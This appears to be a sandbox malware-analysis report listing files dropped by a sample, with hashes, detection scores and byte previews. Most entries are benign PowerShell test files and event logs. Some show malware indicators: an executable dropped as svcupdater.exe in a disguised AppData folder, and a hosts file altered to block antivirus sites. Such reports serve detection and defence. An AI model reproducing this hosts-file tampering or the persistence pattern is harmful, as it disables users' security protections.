                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ym30yoic.nvl.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yuraqkd0.nvk.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yw2cxymz.l2z.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zkzqfkjt.xzy.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\poduiwcd.tmp

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\LicSend.exe
                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):155136
                                                                                                  Entropy (8bit):7.7612316741526906
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:8QpsuldSMGh+tWWP286pB7YnaEV2d77rRzCLghAaeSdk4cXjU8D5BCG3MSrOUhEa:8QpsuldSMGh+288BYTOVCUhAL4ajlHCc
                                                                                                  MD5:9DE1DECE6C8E92D128133FC779F07AD3
                                                                                                  SHA1:02CC6BD7775D7D024DB6E5AE3DAFE9F8FF001ECB
                                                                                                  SHA-256:3C6AC3153ECB32704D9CD808BFA8872275DD7ED0A49E9709A55FC3511A0AAC4B
                                                                                                  SHA-512:CB1E68792F6BA2994AE30482D6316EE04BFDAC72B8CCCC190BF1F0680D72E59A201732C934D918EA987DD966F0FB8A66100ABFBE27CA4506EDFBF5DF747D4558
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 75%
                                                                                                  Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$........1a..P...P...P...;...P...;...P...P...P..,)...P..,)...P...P...P..,)...P..Rich.P..........PE..d.....[c.........."..........H......8..........@..........................................`.................................................PK.......`...%...P..x...................8I..8............................................0...............................text............................... ..`.rdata.......0... ..................@..@.pdata..x....P.......6..............@..@.rsrc....%...`...&...8..............@..@........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\LicCheck.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):831814656
                                                                                                  Entropy (8bit):7.999850762854944
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:
                                                                                                  MD5:60EF19D1B9B74D6AAD6007EBBF88CDF3
                                                                                                  SHA1:168F806935D7C826F3F8DE5B9815EA4E16A2D41A
                                                                                                  SHA-256:9233825426E8D6CA1002B61E0D989A732640C5EC546DE9D0382D76D8944389AB
                                                                                                  SHA-512:EEBCBBCC233B70CBBE418EF749B13A0650614B3B2FE7BB7524C3C7A1A33230EFAF86408E3A3C2D1FC1401F08A6D224A5F0F7F4C2264E6CD9F76857F69CFA9A53
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Q...Q...Q.....\...........G.......@.......G.............Z...Q...&.......T...../.P.......P...RichQ...........................PE..L...Ru.c...............".<...H.......S.......P....@.......................................@..................................E..x....p...........................%.. ...8...........................`...@............P...............................text....:.......<.................. ..`.rdata.......P.......@..............@..@.data........P.......@..............@....rsrc........p.......T..............@..@.reloc...%.......&...V..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.pid

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4
                                                                                                  Entropy (8bit):2.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:v7:D
                                                                                                  MD5:B5D62AA6024AB6A65A12C78C4C2D4EFC
                                                                                                  SHA1:31BBE8B6473B6F9ED5B03F8D8D1994A77A36D355
                                                                                                  SHA-256:1D4F494A87064D8F179D07E3A85B9C87491DE1AF7BD5B06E9DB33C0C735D045F
                                                                                                  SHA-512:83F4B5A2F51D1CD016250366A79912F282D57047AA3B9E825B4874CC21462C06DC9E5C1528C1FDFB7978C4E98142C4A62CDE495C58D2A3C4C4D638FEFA98C2AD
                                                                                                  Malicious:false
                                                                                                  Preview:7904

                                                                                                  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                  Download File
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):64
                                                                                                  Entropy (8bit):0.34726597513537405
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Nlll:Nll
                                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                  Malicious:false
                                                                                                  Preview:@...e...........................................................

                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):64
                                                                                                  Entropy (8bit):1.1940658735648508
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:NlllulNl/lh:NllUNt
                                                                                                  MD5:2D7F0F1AAE8DE3A839C161015FFE9AF9
                                                                                                  SHA1:8CBCE934935F336132CE2486924F77532032E499
                                                                                                  SHA-256:459CBF555246AC8C93A031BAD431921CC6D2D1F6963710878FAC55F2C256748B
                                                                                                  SHA-512:EB90C32582BC3269F0196C5B5EF268BA635B6E5D12B5CC24B8DAC4DBD9F080AE010D326F1307882C5B528AE0B2BC5411C69E5ACB08F76A1508F17A3F908506EB
                                                                                                  Malicious:false
                                                                                                  Preview:@...e.................................b.%............@..........

                                                                                                  C:\Windows\System32\drivers\etc\hosts

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\LicSend.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3755
                                                                                                  Entropy (8bit):4.260594595712815
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:vDZEurK9XiCW1Ri4qun5Asxp7phxFyA6JJxBXk:RrK96
                                                                                                  MD5:6F0DC39B7450E61940780F3CC3C445EC
                                                                                                  SHA1:C79089A0004C821B8830DBC498FC7A52FC493998
                                                                                                  SHA-256:FDC51A315BCE4DB94D38441B394234A14E9E246626A8ED7A65F9B8332DA6C736
                                                                                                  SHA-512:B1A369B4A3E8D157481988F082554315465A0A5DB0EBC3650A3230A72D232DF04B38E0F3E23BD10F8568DED6E4E41473451D3C9A22F1F5F9B5A3D9A7CA6EEDB1
                                                                                                  Malicious:true
                                                                                                  Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....0.0.0.0 avast.com..0.0.0.0 www.avast.com..0.0.0.0 totalav.com..0.0.0.0 www.totalav.com..0.0.0.0 scanguard.com..0.0.0.0 www.scanguard.com..

                                                                                                  C:\Windows\System32\winevt\Logs\Application.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):4.065306333939132
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:wapbQZUE1lA6vOUZucxvbNp8CCeoc0ZbU2AjQwEPnPK0xv:7bQZUE1lTkctNp8/cWU2Ajs7
                                                                                                  MD5:CFA5D8C6778D2B28A5EDD415FDFB2232
                                                                                                  SHA1:26B1ED0244515D36098AF2363554D8673BA194E3
                                                                                                  SHA-256:FF05822113A49201F483153EA68D4A1468A73E14D73117356C00D6E33F441E6B
                                                                                                  SHA-512:CF2317DEDFADEC0B5251115CECA90C8CE9A02E46E933BB57DDB494B5B28CD40BC84A188671671AD667043C9F9A7801FECF54DDBB7EDF39DDC28C881B5D97EE8B
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.................r.......s...........X...0...0.......................................................................L`.i............................................=...........................................................................................................................g...............@...........................n...................M...]...........................h...................................................................&...............................................~...**..X...r.........-.............D.&.........D..T.Xb.L............A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Z............{..P.r.o.v.i.d.e.r...7...F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.S.P.P.F........)...G.u.i.d.....&.{.E.2.3.B.3.3.B.0.-.C.8.C.9.-.4.7.2.C.-.A.5.F.9.-.F.2.B.D.F.E.

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):3.1675229063765946
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:ghe6UHi2uepX7xasnPC3FzFtpFDhFPFyF842kT:gVUHiapX7xadptrDT9W84L
                                                                                                  MD5:48126DCE733737985BD110BB2088DC69
                                                                                                  SHA1:3DB620414045613C995B0B2CF6ED565494507883
                                                                                                  SHA-256:E0F449BD165504648633CCE810BFC7ED54065BB9CF104DB61636CD2A7B1C1456
                                                                                                  SHA-512:FEE7012A7768B83DB4327EF7661E301D06A6A381FAD083091488B9EB4A6A89239D07FBB10B1D3C0B63258290EC78FDFBD2FD846E7F33088FEE3F01C62AD5B80B
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........1...............1...........p.................................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........r...................m..............qo...................>...;..................**..............4.9...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppModel-Runtime%4Admin.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):2.010692427789071
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:GhLNzhNCjN0QNGNgN7NxEN5N0RN0zN0mN0RN00N0oN0xN0qNeN0NN0UN0lN09N0Q:GnqqIJMa/Mh9sUwBYAJGUarGlEwxV
                                                                                                  MD5:26C4C5213F3C6B727417EF07207AC1E0
                                                                                                  SHA1:1815CC405C8B70939C252390E2A1AEC87EFF45F2
                                                                                                  SHA-256:767656ADC7440970A3117E0DA8E066D9A3E1DA88CBC82ACABCFA37A3985D5608
                                                                                                  SHA-512:0355BBF16EB471698F47189031E8E18306D8F748E6CC5328C33301BEAAE435647532B24F5EC42A94B92390C19E60D11846B412C6747DC82DC98999E649607B65
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.%.......J.......%.......J............b..Pe.....:....................................................................&...................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...........].......M...............................VY..................................**......%........0................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):4.178337740828219
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:HhfVaVtVbVHVyV5V+VSVBVNVEVrVBVeVPVpVCVigVgVpVeVNVkVUVAVJVgV6VdVM:Hhfrst
                                                                                                  MD5:B4371846E14FE005588B824811B79612
                                                                                                  SHA1:D1C96C41056FBD1553672AECE269D5531C9AF09F
                                                                                                  SHA-256:85FC60BA29FC413B00226720EE0332001F3807B6D8272231B7B884350E307F64
                                                                                                  SHA-512:72AC4D904F4753707669D5EE7E356EEDA928FD1B549B242E76BBAB6852952C34009C504AE8F1CE7562A4394E269EE49AA16E2D1D23CE41EEABD2467119E043E3
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk...............................................82.....................................................................&..................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**.. .............k...............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):4.428043971814917
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:ChTm5mcVmNQemomTDDr0moOm3OPlfmMsgJm5mnmYmcmum/mqmlmtmumbsmbmvMmk:CJqD6CL49mVpgwQFQ
                                                                                                  MD5:103F7E7E848D4ADE87AACB679E86AFEC
                                                                                                  SHA1:FFDA8B4682F7FF10203C99CE318B61A7161B9F93
                                                                                                  SHA-256:75D0A859AF69BC87BF805A2E5992CFCD925C7FB4C3192EDF76970950AA305D9B
                                                                                                  SHA-512:6F82E8008A264B942A1C8BF1A5303EB6D6CE8520930A78A117E7FEDB6C0F2D5837FC78D7CCCB7C495BB68FDC821AB31131578E52CC328900F77D9F2B5D29D64E
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk..!.......!.......!.......!..................Xa.p.....................................................................mp.................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................#...............&...................................**.......!......o.T..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):0.3522757798397909
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:M5WNWwrP+AQNRBEZWTENO4bnB+zMgq+ckH58ykH5bOTLHyNdHLP7jM8ckH58ykHc:MNVaO8sMa3Z85ZML8rjjh3Z85Zu
                                                                                                  MD5:F6AF6BF78202C4DC66CA95D5A01AA34B
                                                                                                  SHA1:3FECE6D384F58D7EF51855BEABF89302931E32D0
                                                                                                  SHA-256:385A80DADB7D7F812F8551B5BF79FE5F665F58F1401558F65121F56C929D7918
                                                                                                  SHA-512:6F1269A6EB924318AD41E2576F3203B4C048AD241D28EC1AFF7643EB480415B0939F6F7C81B20A42C8749D534DAEAB4745F09B1B574CF5672C8DBC58D7836BD0
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.....................................p........u.m.....................................................................`.T............................................=...........................................................................................................................f...............?...................................p...........M...F...................................................................................................................................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):4.014860518194814
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:xbBN2A4VD7VAx8whAGU2woJQghcI5oIRA4Hw:
                                                                                                  MD5:4FB8E2CF8B3F20534836684947962DC2
                                                                                                  SHA1:B263607E627C81DA77DB65DF5AED2F3FD84B83E2
                                                                                                  SHA-256:DEAB680C467984C31D118AC595F0F57E573CEEC460CC4B43FCEB0BD66F731294
                                                                                                  SHA-512:D982DB741A044E222D567712FB4799FF6524A1D451C3D2EE3DF7EB17031AD20EF4EC7098BCFB3E2B00C929EB6569C858EFCF275B28240425E4BF8D994AED9053
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........V...............V...................0q....................................................................... I............................................=...................................................................................%.......................................X...............?...............................................M...F...................................................................................................................................z...............**..............................g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):4.15655690871689
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:SPB9TXYa1RFxRaayVadMRFyfqd9xZRta7Ea+5BVZUeaBhN1dJhlBlBJ9tFk6dd3s:eXY5nVYIyyqED5BVZUeouPZ
                                                                                                  MD5:2DE60575CB719BF51FAB8A63F696B052
                                                                                                  SHA1:BD44E6B92412898F185D5565865FEA3778573578
                                                                                                  SHA-256:7C14D6D72CD2DE834A0C4D17A68B2584B83B81C647D2C439E1071600E29A803D
                                                                                                  SHA-512:0471E7824795996992E736F33FEA7AF70EA909804DE3AC59EE76B5D0403901A5147558256C3AAE87BA8F1747D151DE63134661BEB9F6E0FF25AB0E3E89BC6B4A
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........o...............o..........................................................................................._..................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................y.......................**................9..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):72208
                                                                                                  Entropy (8bit):2.260571874353449
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:qoEoaywoRoayIoFoayroeoayEoxoayWhdo69CcoTorNorWorbvorTorZorQorNov:kDCYy
                                                                                                  MD5:7DF71309776F368DE2BB0E21C258B6D1
                                                                                                  SHA1:56227E13FCC516E5AB674E6A4E23C8FFA7A15D95
                                                                                                  SHA-256:FE09C8FB11B883520EC2CBF380343B517051E9F435579263344CE818BF167A4D
                                                                                                  SHA-512:4D4C5A24AF56BECFD5F3CA0AC0B7E292B73655C248B669514D22933290362453F0AFCA3D521853742C27CD5AD30E2730664056CFE4626208127E72856B7FAF99
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........)...............)...........Hb...d..U[.........................................................................4................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................3..................................=/...........$..U)..............................**...... .........................$..............................................................>.......V...7.!..o.......................&O......(O....L...P... ....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y..k.N.<.D..97d>7.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y./.O.p.e.r.a.t.i.o.n.a.l...be.`=/..................l...............K.\.D.e.v.i.c.e.\.H.a.r.d.d.i.s.k.V.o.l.u.m.e.3.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-BindFlt%4Operational.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):0.8524226245257144
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:JhAiPA5PNPxPEPHPhPEPmPSPRP3PoPpPTP8PXPr5P:J2Nr
                                                                                                  MD5:B8E105CC52B7107E2757421373CBA144
                                                                                                  SHA1:39B61BEA2065C4FBEC143881220B37F3BA50A372
                                                                                                  SHA-256:B7EE076088005866A01738ECD3421A4DA3A389FFB9EEB663687823E6647F7B4B
                                                                                                  SHA-512:7670455904F14DA7A9EEFBAD5616D6D00EA262C979EDABB433182500B6EF918C6E534C94DF30D829016C8539DF12CAD5F53EC884C45AA71ACA35CF9B797361BC
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk......................................#...&...l2.......................................................................................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................................................................#..........'.......................**..x.............|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-Wcifs%4Operational.evtx

